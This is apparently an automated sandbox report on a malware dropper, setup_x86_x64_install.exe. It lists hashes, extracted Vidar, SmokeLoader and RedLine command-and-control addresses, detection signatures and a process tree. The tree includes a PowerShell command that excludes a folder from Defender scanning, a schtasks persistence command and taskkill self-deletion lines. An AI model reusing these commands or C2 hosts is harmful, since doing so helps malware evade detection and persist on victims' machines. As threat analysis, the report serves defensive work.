Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
49s -
max time network
617s -
platform
windows7_x64 -
resource
win7-jp -
submitted
10-09-2021 20:48
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
4.4MB
-
MD5
65eed0fdbee8b81c1b9118f86700c6fd
-
SHA1
fcca1e88a99e2f20403e963b798e3f68f58d638d
-
SHA256
3cf08993fa4866df41dc37cec849e5a5e9d0bcb6ea6660c30130d9e2fd2f623d
-
SHA512
f4c88eea9b410ea353ca9dc10c97dcfb360f9ef115d17eca1f12a4a702bc0b787cf48bfb2e6d993b8ad64ff4a0f9a2165d70eb1ae7b48652a3f5d8862543b3ac
Malware Config
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
pab123
45.14.49.169:22411
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3024 2176 rundll32.exe 60 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1396 2176 rundll32.exe 60 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral1/memory/1576-221-0x0000000002EA0000-0x0000000002EBF000-memory.dmp family_redline behavioral1/memory/1576-248-0x0000000004730000-0x000000000474E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral1/files/0x0001000000012f2c-111.dat family_socelars behavioral1/files/0x0001000000012f2c-171.dat family_socelars -
Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/792-217-0x0000000000400000-0x00000000021B7000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x0001000000012f2e-69.dat aspack_v212_v242 behavioral1/files/0x0001000000012f2e-70.dat aspack_v212_v242 behavioral1/files/0x0001000000012f2d-71.dat aspack_v212_v242 behavioral1/files/0x0001000000012f2d-72.dat aspack_v212_v242 behavioral1/files/0x0001000000012f30-75.dat aspack_v212_v242 behavioral1/files/0x0001000000012f30-76.dat aspack_v212_v242 -
Blocklisted process makes network request 1 IoCs
flow pid Process 15 1700 cmd.exe -
Downloads MZ/PE file
-
Executes dropped EXE 19 IoCs
pid Process 1188 setup_installer.exe 1248 setup_install.exe 792 Fri192902b3c24.exe 1616 Fri1921f7a9d3.exe 1816 Fri191454c4b4.exe 1568 Fri192f077acf656dd.exe 1488 Fri19870e2febf5544.exe 1700 Fri19b9b73e83c948b1d.exe 1324 Fri192b9eeaa03b.exe 1992 Fri195cd4dbfdf37897.exe 764 Fri19d30056588.exe 1692 Fri192c305b4a.exe 1576 Fri19927b4fe38a9d1.exe 672 Fri192b9eeaa03b.tmp 1068 Fri195cd4dbfdf37897.tmp 2224 Chrome 5.exe 2272 1.exe 2308 2.exe 2348 3.exe -
Loads dropped DLL 60 IoCs
pid Process 1920 setup_x86_x64_install.exe 1188 setup_installer.exe 1188 setup_installer.exe 1188 setup_installer.exe 1188 setup_installer.exe 1188 setup_installer.exe 1188 setup_installer.exe 1248 setup_install.exe 1248 setup_install.exe 1248 setup_install.exe 1248 setup_install.exe 1248 setup_install.exe 1248 setup_install.exe 1248 setup_install.exe 1248 setup_install.exe 300 cmd.exe 1500 cmd.exe 1500 cmd.exe 792 Fri192902b3c24.exe 792 Fri192902b3c24.exe 1012 cmd.exe 1440 cmd.exe 1440 cmd.exe 1104 cmd.exe 1616 Fri1921f7a9d3.exe 1616 Fri1921f7a9d3.exe 1568 Fri192f077acf656dd.exe 1568 Fri192f077acf656dd.exe 548 cmd.exe 548 cmd.exe 1488 Fri19870e2febf5544.exe 1488 Fri19870e2febf5544.exe 1604 cmd.exe 1260 cmd.exe 1120 cmd.exe 112 cmd.exe 1324 Fri192b9eeaa03b.exe 1324 Fri192b9eeaa03b.exe 288 cmd.exe 288 cmd.exe 1700 Fri19b9b73e83c948b1d.exe 1700 Fri19b9b73e83c948b1d.exe 1992 Fri195cd4dbfdf37897.exe 1992 Fri195cd4dbfdf37897.exe 1324 Fri192b9eeaa03b.exe 1576 Fri19927b4fe38a9d1.exe 1576 Fri19927b4fe38a9d1.exe 1992 Fri195cd4dbfdf37897.exe 672 Fri192b9eeaa03b.tmp 672 Fri192b9eeaa03b.tmp 672 Fri192b9eeaa03b.tmp 764 Fri19d30056588.exe 764 Fri19d30056588.exe 1068 Fri195cd4dbfdf37897.tmp 1068 Fri195cd4dbfdf37897.tmp 1068 Fri195cd4dbfdf37897.tmp 1568 Fri192f077acf656dd.exe 1568 Fri192f077acf656dd.exe 1568 Fri192f077acf656dd.exe 1568 Fri192f077acf656dd.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3520 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 138 ipinfo.io 302 freegeoip.app 304 freegeoip.app 308 freegeoip.app 325 api.2ip.ua 326 api.2ip.ua 7 ipinfo.io 12 ipinfo.io 144 ipinfo.io 305 freegeoip.app 338 api.2ip.ua -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
pid pid_target Process procid_target 2572 2508 WerFault.exe 69 1544 2576 WerFault.exe 72 2884 2544 WerFault.exe 71 1392 792 WerFault.exe 39 2636 3060 WerFault.exe 87 2368 968 WerFault.exe 85 1736 564 WerFault.exe 206 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Fri19870e2febf5544.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Fri19870e2febf5544.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Fri19870e2febf5544.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1900 schtasks.exe 2472 schtasks.exe 3464 schtasks.exe 1584 schtasks.exe 3520 schtasks.exe -
Kills process with taskkill 5 IoCs
pid Process 760 taskkill.exe 3712 taskkill.exe 3988 taskkill.exe 4048 taskkill.exe 576 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Fri19d30056588.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Fri19d30056588.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3132 PING.EXE -
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 66 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 143 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid Process 1488 Fri19870e2febf5544.exe 1488 Fri19870e2febf5544.exe 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found 1336 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1488 Fri19870e2febf5544.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 764 Fri19d30056588.exe Token: SeAssignPrimaryTokenPrivilege 764 Fri19d30056588.exe Token: SeLockMemoryPrivilege 764 Fri19d30056588.exe Token: SeIncreaseQuotaPrivilege 764 Fri19d30056588.exe Token: SeMachineAccountPrivilege 764 Fri19d30056588.exe Token: SeTcbPrivilege 764 Fri19d30056588.exe Token: SeSecurityPrivilege 764 Fri19d30056588.exe Token: SeTakeOwnershipPrivilege 764 Fri19d30056588.exe Token: SeLoadDriverPrivilege 764 Fri19d30056588.exe Token: SeSystemProfilePrivilege 764 Fri19d30056588.exe Token: SeSystemtimePrivilege 764 Fri19d30056588.exe Token: SeProfSingleProcessPrivilege 764 Fri19d30056588.exe Token: SeIncBasePriorityPrivilege 764 Fri19d30056588.exe Token: SeCreatePagefilePrivilege 764 Fri19d30056588.exe Token: SeCreatePermanentPrivilege 764 Fri19d30056588.exe Token: SeBackupPrivilege 764 Fri19d30056588.exe Token: SeRestorePrivilege 764 Fri19d30056588.exe Token: SeShutdownPrivilege 764 Fri19d30056588.exe Token: SeDebugPrivilege 764 Fri19d30056588.exe Token: SeAuditPrivilege 764 Fri19d30056588.exe Token: SeSystemEnvironmentPrivilege 764 Fri19d30056588.exe Token: SeChangeNotifyPrivilege 764 Fri19d30056588.exe Token: SeRemoteShutdownPrivilege 764 Fri19d30056588.exe Token: SeUndockPrivilege 764 Fri19d30056588.exe Token: SeSyncAgentPrivilege 764 Fri19d30056588.exe Token: SeEnableDelegationPrivilege 764 Fri19d30056588.exe Token: SeManageVolumePrivilege 764 Fri19d30056588.exe Token: SeImpersonatePrivilege 764 Fri19d30056588.exe Token: SeCreateGlobalPrivilege 764 Fri19d30056588.exe Token: 31 764 Fri19d30056588.exe Token: 32 764 Fri19d30056588.exe Token: 33 764 Fri19d30056588.exe Token: 34 764 Fri19d30056588.exe Token: 35 764 Fri19d30056588.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1068 Fri195cd4dbfdf37897.tmp 1336 Process not Found 1336 Process not Found -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1336 Process not Found 1336 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1920 wrote to memory of 1188 1920 setup_x86_x64_install.exe 26 PID 1920 wrote to memory of 1188 1920 setup_x86_x64_install.exe 26 PID 1920 wrote to memory of 1188 1920 setup_x86_x64_install.exe 26 PID 1920 wrote to memory of 1188 1920 setup_x86_x64_install.exe 26 PID 1920 wrote to memory of 1188 1920 setup_x86_x64_install.exe 26 PID 1920 wrote to memory of 1188 1920 setup_x86_x64_install.exe 26 PID 1920 wrote to memory of 1188 1920 setup_x86_x64_install.exe 26 PID 1188 wrote to memory of 1248 1188 setup_installer.exe 27 PID 1188 wrote to memory of 1248 1188 setup_installer.exe 27 PID 1188 wrote to memory of 1248 1188 setup_installer.exe 27 PID 1188 wrote to memory of 1248 1188 setup_installer.exe 27 PID 1188 wrote to memory of 1248 1188 setup_installer.exe 27 PID 1188 wrote to memory of 1248 1188 setup_installer.exe 27 PID 1188 wrote to memory of 1248 1188 setup_installer.exe 27 PID 1248 wrote to memory of 332 1248 setup_install.exe 30 PID 1248 wrote to memory of 332 1248 setup_install.exe 30 PID 1248 wrote to memory of 332 1248 setup_install.exe 30 PID 1248 wrote to memory of 332 1248 setup_install.exe 30 PID 1248 wrote to memory of 332 1248 setup_install.exe 30 PID 1248 wrote to memory of 332 1248 setup_install.exe 30 PID 1248 wrote to memory of 332 1248 setup_install.exe 30 PID 1248 wrote to memory of 1120 1248 setup_install.exe 29 PID 1248 wrote to memory of 1120 1248 setup_install.exe 29 PID 1248 wrote to memory of 1120 1248 setup_install.exe 29 PID 1248 wrote to memory of 1120 1248 setup_install.exe 29 PID 1248 wrote to memory of 1120 1248 setup_install.exe 29 PID 1248 wrote to memory of 1120 1248 setup_install.exe 29 PID 1248 wrote to memory of 1120 1248 setup_install.exe 29 PID 1248 wrote to memory of 1260 1248 setup_install.exe 31 PID 1248 wrote to memory of 1260 1248 setup_install.exe 31 PID 1248 wrote to memory of 1260 1248 setup_install.exe 31 PID 1248 wrote to memory of 1260 1248 setup_install.exe 31 PID 1248 wrote to memory of 1260 1248 setup_install.exe 31 PID 1248 wrote to memory of 1260 1248 setup_install.exe 31 PID 1248 wrote to memory of 1260 1248 setup_install.exe 31 PID 1248 wrote to memory of 300 1248 setup_install.exe 32 PID 1248 wrote to memory of 300 1248 setup_install.exe 32 PID 1248 wrote to memory of 300 1248 setup_install.exe 32 PID 1248 wrote to memory of 300 1248 setup_install.exe 32 PID 1248 wrote to memory of 300 1248 setup_install.exe 32 PID 1248 wrote to memory of 300 1248 setup_install.exe 32 PID 1248 wrote to memory of 300 1248 setup_install.exe 32 PID 1248 wrote to memory of 1604 1248 setup_install.exe 34 PID 1248 wrote to memory of 1604 1248 setup_install.exe 34 PID 1248 wrote to memory of 1604 1248 setup_install.exe 34 PID 1248 wrote to memory of 1604 1248 setup_install.exe 34 PID 1248 wrote to memory of 1604 1248 setup_install.exe 34 PID 1248 wrote to memory of 1604 1248 setup_install.exe 34 PID 1248 wrote to memory of 1604 1248 setup_install.exe 34 PID 1248 wrote to memory of 1500 1248 setup_install.exe 36 PID 1248 wrote to memory of 1500 1248 setup_install.exe 36 PID 1248 wrote to memory of 1500 1248 setup_install.exe 36 PID 1248 wrote to memory of 1500 1248 setup_install.exe 36 PID 1248 wrote to memory of 1500 1248 setup_install.exe 36 PID 1248 wrote to memory of 1500 1248 setup_install.exe 36 PID 1248 wrote to memory of 1500 1248 setup_install.exe 36 PID 1248 wrote to memory of 112 1248 setup_install.exe 37 PID 1248 wrote to memory of 112 1248 setup_install.exe 37 PID 1248 wrote to memory of 112 1248 setup_install.exe 37 PID 1248 wrote to memory of 112 1248 setup_install.exe 37 PID 1248 wrote to memory of 112 1248 setup_install.exe 37 PID 1248 wrote to memory of 112 1248 setup_install.exe 37 PID 1248 wrote to memory of 112 1248 setup_install.exe 37 PID 1500 wrote to memory of 792 1500 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192c305b4a.exe4⤵
- Loads dropped DLL
PID:1120 -
C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri192c305b4a.exeFri192c305b4a.exe5⤵
- Executes dropped EXE
PID:1692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:332
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192b9eeaa03b.exe4⤵
- Loads dropped DLL
PID:1260 -
C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri192b9eeaa03b.exeFri192b9eeaa03b.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1324 -
C:\Users\Admin\AppData\Local\Temp\is-PTFDF.tmp\Fri192b9eeaa03b.tmp"C:\Users\Admin\AppData\Local\Temp\is-PTFDF.tmp\Fri192b9eeaa03b.tmp" /SL5="$60140,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri192b9eeaa03b.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:672 -
C:\Users\Admin\AppData\Local\Temp\is-3AL00.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-3AL00.tmp\46807GHF____.exe" /S /UID=burnerch27⤵PID:2456
-
C:\Program Files\Microsoft Office\QOHFGMYKOG\ultramediaburner.exe"C:\Program Files\Microsoft Office\QOHFGMYKOG\ultramediaburner.exe" /VERYSILENT8⤵PID:2788
-
C:\Users\Admin\AppData\Local\Temp\is-RTQ4C.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-RTQ4C.tmp\ultramediaburner.tmp" /SL5="$4026E,281924,62464,C:\Program Files\Microsoft Office\QOHFGMYKOG\ultramediaburner.exe" /VERYSILENT9⤵PID:548
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:1036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c8-88a3a-985-85aa1-318fa895febbe\Cakishaqopo.exe"C:\Users\Admin\AppData\Local\Temp\c8-88a3a-985-85aa1-318fa895febbe\Cakishaqopo.exe"8⤵PID:3016
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:3300
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3300 CREDAT:275457 /prefetch:210⤵PID:3468
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3300 CREDAT:603160 /prefetch:210⤵PID:1592
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:3916
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:275457 /prefetch:210⤵PID:760
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dc-a9217-e8c-cf9ab-d6d772bad938b\Kixyhehody.exe"C:\Users\Admin\AppData\Local\Temp\dc-a9217-e8c-cf9ab-d6d772bad938b\Kixyhehody.exe"8⤵PID:2996
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\owikjgqj.hy4\GcleanerEU.exe /eufive & exit9⤵
- Blocklisted process makes network request
PID:1700 -
C:\Users\Admin\AppData\Local\Temp\owikjgqj.hy4\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\owikjgqj.hy4\GcleanerEU.exe /eufive10⤵PID:1532
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\owikjgqj.hy4\GcleanerEU.exe" & exit11⤵PID:2184
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
PID:760
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fkm1o1fy.idp\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:4092
-
C:\Users\Admin\AppData\Local\Temp\fkm1o1fy.idp\installer.exeC:\Users\Admin\AppData\Local\Temp\fkm1o1fy.idp\installer.exe /qn CAMPAIGN="654"10⤵PID:1752
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\fkm1o1fy.idp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\fkm1o1fy.idp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631048318 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:2904
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\44eby2zy.s1z\anyname.exe & exit9⤵PID:3632
-
C:\Users\Admin\AppData\Local\Temp\44eby2zy.s1z\anyname.exeC:\Users\Admin\AppData\Local\Temp\44eby2zy.s1z\anyname.exe10⤵PID:3656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r3pwsoru.ybh\gcleaner.exe /mixfive & exit9⤵PID:3436
-
C:\Users\Admin\AppData\Local\Temp\r3pwsoru.ybh\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\r3pwsoru.ybh\gcleaner.exe /mixfive10⤵PID:2188
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\r3pwsoru.ybh\gcleaner.exe" & exit11⤵PID:3344
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:3712
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ftk4ksc1.lbb\autosubplayer.exe /S & exit9⤵PID:3892
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri191454c4b4.exe4⤵
- Loads dropped DLL
PID:300 -
C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri191454c4b4.exeFri191454c4b4.exe5⤵
- Executes dropped EXE
PID:1816 -
C:\ProgramData\6603981.exe"C:\ProgramData\6603981.exe"6⤵PID:968
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 968 -s 17207⤵
- Program crash
PID:2368
-
-
-
C:\ProgramData\7011021.exe"C:\ProgramData\7011021.exe"6⤵PID:3016
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:2352
-
-
-
C:\ProgramData\8978880.exe"C:\ProgramData\8978880.exe"6⤵PID:3060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 17687⤵
- Program crash
PID:2636
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri195cd4dbfdf37897.exe4⤵
- Loads dropped DLL
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri195cd4dbfdf37897.exeFri195cd4dbfdf37897.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\is-393VS.tmp\Fri195cd4dbfdf37897.tmp"C:\Users\Admin\AppData\Local\Temp\is-393VS.tmp\Fri195cd4dbfdf37897.tmp" /SL5="$4013C,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS4A4DD084\Fri195cd4dbfdf37897.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\is-V5274.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-V5274.tmp\Setup.exe" /Verysilent7⤵PID:1948
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent8⤵PID:3936
-
C:\Users\Admin\AppData\Local\Temp\is-V3VHE.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-V3VHE.tmp\stats.tmp" /SL5="$20100,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent9⤵PID:4024
-
C:\Users\Admin\AppData\Local\Temp\is-F7KLJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-F7KLJ.tmp\Setup.exe" /Verysilent10⤵PID:2384
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit11⤵PID:2736
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'12⤵
- Creates scheduled task(s)
PID:3464
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"11⤵PID:1724
-
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"11⤵PID:3756
-
